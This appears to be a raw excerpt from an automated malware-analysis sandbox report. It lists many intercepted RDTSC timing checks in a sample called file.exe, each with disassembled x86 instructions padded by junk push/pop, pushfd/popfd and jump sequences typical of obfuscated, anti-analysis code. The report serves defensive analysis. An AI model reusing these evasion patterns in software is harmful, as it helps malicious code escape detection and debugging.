                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564077B second address: 56407C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [76FB65FCh] 0x0000000d pushad 0x0000000e mov edi, 282D1FF0h 0x00000013 movsx edx, ax 0x00000016 popad 0x00000017 test eax, eax 0x00000019 pushad 0x0000001a mov bx, cx 0x0000001d jmp 00007F3DE9170BEAh 0x00000022 popad 0x00000023 je 00007F3E5AA63DA9h 0x00000029 pushad 0x0000002a movzx eax, bx 0x0000002d call 00007F3DE9170BF3h 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56407C2 second address: 56407D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov ecx, eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56407D0 second address: 56407D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56407D4 second address: 56407D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56407D8 second address: 56407DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56408CB second address: 56408D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56408D1 second address: 5640930 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F3DE9170BF2h 0x00000008 pop esi 0x00000009 mov dh, 11h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 call 00007F3DE9170BF3h 0x00000015 mov ecx, 481C7A3Fh 0x0000001a pop ecx 0x0000001b mov dl, 6Fh 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f jmp 00007F3DE9170BECh 0x00000024 mov ebp, esp 0x00000026 jmp 00007F3DE9170BF0h 0x0000002b pop ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov ch, 33h 0x00000031 popad 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5640930 second address: 5640936 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5640936 second address: 564093A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564093A second address: 564093E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0017 second address: 55F003D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov si, AA83h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3DE9170BF5h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F003D second address: 55F0043 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0043 second address: 55F0047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0047 second address: 55F0068 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE916F963h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0068 second address: 55F006C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F006C second address: 55F0072 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0072 second address: 55F0077 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0077 second address: 55F00DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F3DE916F966h 0x0000000a or ch, 00000008h 0x0000000d jmp 00007F3DE916F95Bh 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 and esp, FFFFFFF8h 0x00000019 jmp 00007F3DE916F966h 0x0000001e xchg eax, ecx 0x0000001f jmp 00007F3DE916F960h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F3DE916F95Eh 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F00DF second address: 55F00F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3DE9170BEEh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F00F1 second address: 55F011F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 jmp 00007F3DE916F967h 0x0000000e xchg eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov di, E396h 0x00000016 mov edi, 6422A322h 0x0000001b popad 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F011F second address: 55F0125 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0125 second address: 55F0129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0129 second address: 55F0138 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0138 second address: 55F013E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F013E second address: 55F0174 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE9170BF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3DE9170BF8h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0174 second address: 55F0183 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE916F95Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0183 second address: 55F019B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3DE9170BF4h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F019B second address: 55F01FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE916F95Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebx, dword ptr [ebp+10h] 0x0000000e pushad 0x0000000f mov ax, 85BBh 0x00000013 pushfd 0x00000014 jmp 00007F3DE916F960h 0x00000019 xor cx, EA08h 0x0000001e jmp 00007F3DE916F95Bh 0x00000023 popfd 0x00000024 popad 0x00000025 xchg eax, esi 0x00000026 jmp 00007F3DE916F966h 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F3DE916F95Eh 0x00000033 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F01FF second address: 55F02C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3DE9170BF1h 0x00000009 sbb cx, C686h 0x0000000e jmp 00007F3DE9170BF1h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F3DE9170BF0h 0x0000001a adc esi, 4C656128h 0x00000020 jmp 00007F3DE9170BEBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 xchg eax, esi 0x0000002a jmp 00007F3DE9170BF6h 0x0000002f mov esi, dword ptr [ebp+08h] 0x00000032 jmp 00007F3DE9170BF0h 0x00000037 xchg eax, edi 0x00000038 jmp 00007F3DE9170BF0h 0x0000003d push eax 0x0000003e pushad 0x0000003f movsx edi, cx 0x00000042 popad 0x00000043 xchg eax, edi 0x00000044 pushad 0x00000045 mov ecx, 6A67FF71h 0x0000004a mov dx, si 0x0000004d popad 0x0000004e test esi, esi 0x00000050 jmp 00007F3DE9170BF8h 0x00000055 je 00007F3E5AAAEF44h 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e movsx ebx, cx 0x00000061 push ecx 0x00000062 pop edi 0x00000063 popad 0x00000064 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F02C6 second address: 55F0339 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F3DE916F961h 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007F3DE916F961h 0x0000000f adc ch, FFFFFFC6h 0x00000012 jmp 00007F3DE916F961h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000022 jmp 00007F3DE916F95Eh 0x00000027 je 00007F3E5AAADC67h 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F3DE916F967h 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0339 second address: 55F0351 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3DE9170BF4h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0351 second address: 55F03C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE916F95Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, dword ptr [esi+44h] 0x0000000e jmp 00007F3DE916F966h 0x00000013 or edx, dword ptr [ebp+0Ch] 0x00000016 jmp 00007F3DE916F960h 0x0000001b test edx, 61000000h 0x00000021 jmp 00007F3DE916F960h 0x00000026 jne 00007F3E5AAADC3Ah 0x0000002c jmp 00007F3DE916F960h 0x00000031 test byte ptr [esi+48h], 00000001h 0x00000035 pushad 0x00000036 mov edx, eax 0x00000038 push eax 0x00000039 push edx 0x0000003a mov ch, 98h 0x0000003c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E06DF second address: 55E06E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E06E3 second address: 55E06E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E06E9 second address: 55E07DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3DE9170BF2h 0x00000009 adc cx, ED98h 0x0000000e jmp 00007F3DE9170BEBh 0x00000013 popfd 0x00000014 mov ah, E7h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push esp 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F3DE9170BEEh 0x00000021 adc esi, 62CF17F8h 0x00000027 jmp 00007F3DE9170BEBh 0x0000002c popfd 0x0000002d mov ebx, ecx 0x0000002f popad 0x00000030 mov dword ptr [esp], ebp 0x00000033 jmp 00007F3DE9170BF2h 0x00000038 mov ebp, esp 0x0000003a jmp 00007F3DE9170BF0h 0x0000003f and esp, FFFFFFF8h 0x00000042 jmp 00007F3DE9170BF0h 0x00000047 xchg eax, ebx 0x00000048 pushad 0x00000049 pushfd 0x0000004a jmp 00007F3DE9170BEEh 0x0000004f xor cl, FFFFFFE8h 0x00000052 jmp 00007F3DE9170BEBh 0x00000057 popfd 0x00000058 pushfd 0x00000059 jmp 00007F3DE9170BF8h 0x0000005e sbb eax, 43ED1648h 0x00000064 jmp 00007F3DE9170BEBh 0x00000069 popfd 0x0000006a popad 0x0000006b push eax 0x0000006c pushad 0x0000006d push eax 0x0000006e push edx 0x0000006f call 00007F3DE9170BF5h 0x00000074 pop ecx 0x00000075 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E07DB second address: 55E0874 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F3DE916F961h 0x00000008 xor cx, 9216h 0x0000000d jmp 00007F3DE916F961h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push esi 0x00000016 pushfd 0x00000017 jmp 00007F3DE916F967h 0x0000001c xor cl, 0000004Eh 0x0000001f jmp 00007F3DE916F969h 0x00000024 popfd 0x00000025 pop ecx 0x00000026 popad 0x00000027 xchg eax, ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b mov ch, B6h 0x0000002d pushfd 0x0000002e jmp 00007F3DE916F965h 0x00000033 or cx, E636h 0x00000038 jmp 00007F3DE916F961h 0x0000003d popfd 0x0000003e popad 0x0000003f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0874 second address: 55E087A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E087A second address: 55E093E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F3DE916F964h 0x0000000e mov dword ptr [esp], esi 0x00000011 pushad 0x00000012 mov di, ax 0x00000015 pushfd 0x00000016 jmp 00007F3DE916F95Ah 0x0000001b or esi, 6DBE8FB8h 0x00000021 jmp 00007F3DE916F95Bh 0x00000026 popfd 0x00000027 popad 0x00000028 mov esi, dword ptr [ebp+08h] 0x0000002b jmp 00007F3DE916F966h 0x00000030 sub ebx, ebx 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007F3DE916F967h 0x00000039 sbb ah, FFFFFFDEh 0x0000003c jmp 00007F3DE916F969h 0x00000041 popfd 0x00000042 pushfd 0x00000043 jmp 00007F3DE916F960h 0x00000048 add cx, CED8h 0x0000004d jmp 00007F3DE916F95Bh 0x00000052 popfd 0x00000053 popad 0x00000054 test esi, esi 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 mov edi, 7933B7C6h 0x0000005e movsx edx, ax 0x00000061 popad 0x00000062 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E093E second address: 55E097A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bl 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F3E5AAB662Eh 0x0000000e jmp 00007F3DE9170BEDh 0x00000013 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jmp 00007F3DE9170BF3h 0x00000022 mov di, cx 0x00000025 popad 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E097A second address: 55E098E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3DE916F960h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E098E second address: 55E09CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE9170BEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, esi 0x0000000d jmp 00007F3DE9170BF6h 0x00000012 je 00007F3E5AAB65D2h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F3DE9170BEAh 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E09CB second address: 55E09D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E09D1 second address: 55E09E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3DE9170BECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E09E2 second address: 55E0A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 test byte ptr [76FB6968h], 00000002h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F3DE916F963h 0x00000016 push eax 0x00000017 pop edi 0x00000018 popad 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0A09 second address: 55E0A1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3DE9170BF0h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0A1D second address: 55E0A21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0A21 second address: 55E0A3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F3E5AAB6573h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3DE9170BEAh 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0A3B second address: 55E0A5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F3DE916F961h 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov edx, dword ptr [ebp+0Ch] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0A5C second address: 55E0A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0A60 second address: 55E0A74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE916F960h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0A74 second address: 55E0B02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE9170BEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F3DE9170BF6h 0x0000000f push eax 0x00000010 jmp 00007F3DE9170BEBh 0x00000015 xchg eax, ebx 0x00000016 jmp 00007F3DE9170BF6h 0x0000001b xchg eax, ebx 0x0000001c pushad 0x0000001d mov al, 97h 0x0000001f mov ecx, edx 0x00000021 popad 0x00000022 push eax 0x00000023 jmp 00007F3DE9170BF4h 0x00000028 xchg eax, ebx 0x00000029 pushad 0x0000002a call 00007F3DE9170BEEh 0x0000002f call 00007F3DE9170BF2h 0x00000034 pop esi 0x00000035 pop edx 0x00000036 push eax 0x00000037 push edx 0x00000038 mov bx, cx 0x0000003b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0D89 second address: 55F0DA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007F3DE916F95Dh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0DA6 second address: 55F0DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0DAA second address: 55F0DB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0DB0 second address: 55F0DB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0DB6 second address: 55F0DBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0DBA second address: 55F0DEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F3DE9170BF6h 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F3DE9170BEAh 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0DEB second address: 55F0DFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE916F95Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0DFA second address: 55F0E00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0E00 second address: 55F0E04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0A7C second address: 55F0A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0A80 second address: 55F0A84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0A84 second address: 55F0A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0A8A second address: 55F0AB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE916F960h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3DE916F967h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0AB8 second address: 55F0B1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 pushfd 0x00000006 jmp 00007F3DE9170BEBh 0x0000000b and cl, 0000000Eh 0x0000000e jmp 00007F3DE9170BF9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov bh, ch 0x0000001d pushfd 0x0000001e jmp 00007F3DE9170BEFh 0x00000023 sub si, 481Eh 0x00000028 jmp 00007F3DE9170BF9h 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5670755 second address: 5670769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov dx, 1612h 0x0000000e mov ebx, 217D815Eh 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5670769 second address: 567076F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567076F second address: 5670795 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3DE916F969h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5670795 second address: 567079B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567079B second address: 567079F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5660865 second address: 566086B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 566086B second address: 5660871 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5660871 second address: 5660875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5660875 second address: 566089A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE916F968h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 566089A second address: 566089E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 566089E second address: 56608A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
